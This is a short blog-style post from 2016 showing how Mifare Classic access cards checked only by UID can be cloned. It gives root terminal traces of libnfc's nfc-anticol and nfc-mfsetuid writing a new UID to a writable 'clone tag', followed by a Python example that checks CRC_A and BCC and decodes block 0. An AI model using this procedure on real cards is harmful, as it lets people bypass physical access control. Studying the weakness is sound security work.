Nov 10, 2016

I observed that most Mifare Classic based access cards are checked using only the first 4 bytes (the UID). These can be read with an Android phone and, for example, the “NFC TagInfo” app. Afterwards, cloning can be done using an ACR122U and “Chinese clone tags”. These tags are special: they allow reading AND writing of the first 4 bytes, while regular tags don’t. On Linux, changing the tag ID (the first 4 bytes) can be done using libnfc. The output may look like this (changing the ID from 01234567 to da08738d):

Check tag ID:

root@laptop:~/rfid# nfc-anticol 
NFC reader: ACS / ACR122U PICC Interface opened

Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: 01  23  45  67  00  
Sent bits:     93  70  01  23  45  67  00  d0  6f  
Received bits: 08  b6  dd  
Sent bits:     50  00  57  cd  

Found tag with
 UID: 01234567
ATQA: 0004
 SAK: 08

Change the ID to da08738d:

root@laptop:~/rfid# nfc-mfsetuid da08738d
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: 01  23  45  67  00  
Sent bits:     93  70  01  23  45  67  00  d0  6f  
Received bits: 08  b6  dd  

Found tag with
 UID: 01234567
ATQA: 0004
 SAK: 08

Sent bits:     50  00  57  cd  
Sent bits:     40 (7 bits)
Received bits: a (4 bits)
Sent bits:     43  
Received bits: 0a  
Sent bits:     a0  00  5f  b1  
Received bits: 0a  
Sent bits:     da  08  73  8d  2c  08  04  00  46  59  25  58  49  10  23  02  c2  99  
Received bits: 0a  

Check if write was successful:

root@laptop:~/rfid# nfc-anticol 
NFC reader: ACS / ACR122U PICC Interface opened

Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: da  08  73  8d  2c  
Sent bits:     93  70  da  08  73  8d  2c  bd  37  
Received bits: 08  b6  dd  
Sent bits:     50  00  57  cd  

Found tag with
 UID: da08738d
ATQA: 0004
 SAK: 08
root@laptop:~/rfid#
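To make sense of the frames in the traces above, here is an added example (my own code, not part of libnfc or the tools shown) that verifies the ISO 14443-A CRC_A trailer on each frame, the BCC byte that follows the UID, and decodes the 16-byte block 0 that nfc-mfsetuid writes. It shows why a UID-only check is weak: the UID is ordinary data in block 0 protected by nothing more than a one-byte XOR checksum, so any tag with a writable block 0 can present any UID.

```python
# Added example (not from the original post). Frames below are copied from the
# traces above and rebuilt as constructed byte strings.

def crc_a(data: bytes) -> bytes:
    """ISO 14443-A CRC_A (reflected poly 0x8408, init 0x6363), returned low byte first."""
    crc = 0x6363
    for b in data:
        b ^= crc & 0xFF
        b ^= (b << 4) & 0xFF
        crc = ((crc >> 8) ^ (b << 8) ^ (b << 3) ^ (b >> 4)) & 0xFFFF
    return bytes((crc & 0xFF, crc >> 8))

def bcc(uid: bytes) -> int:
    """Block Check Character: XOR of the 4 UID bytes (5th byte of the anticollision reply)."""
    assert len(uid) == 4
    return uid[0] ^ uid[1] ^ uid[2] ^ uid[3]

def check_frame(frame: bytes) -> bool:
    """True if the last two bytes of a frame are a valid CRC_A over the preceding bytes."""
    return len(frame) >= 3 and crc_a(frame[:-2]) == frame[-2:]

def parse_block0(block: bytes) -> dict:
    """Decode a Mifare Classic manufacturer block with the 4-byte UID layout:
    UID(4) BCC(1) SAK(1) ATQA(2, LSB first) manufacturer data(8)."""
    assert len(block) == 16
    uid = block[0:4]
    return {
        "uid": uid.hex(),
        "bcc_ok": block[4] == bcc(uid),
        "sak": block[5],
        "atqa": block[6:8].hex(),          # "0400" on the wire is ATQA 0004 in the trace
        "manufacturer_data": block[8:16].hex(),
    }

if __name__ == "__main__":
    select = bytes.fromhex("93700123456700d06f")  # SELECT: 93 70 + UID + BCC + CRC_A
    halt = bytes.fromhex("500057cd")              # HLTA: 50 00 + CRC_A
    write_cmd = bytes.fromhex("a0005fb1")         # WRITE block 0 + CRC_A
    payload = bytes.fromhex("da08738d2c0804004659255849102302c299")
    for name, f in (("select", select), ("halt", halt),
                    ("write", write_cmd), ("block0", payload)):
        print(f"{name}: CRC_A {'ok' if check_frame(f) else 'BAD'}")
    print(parse_block0(payload[:-2]))
```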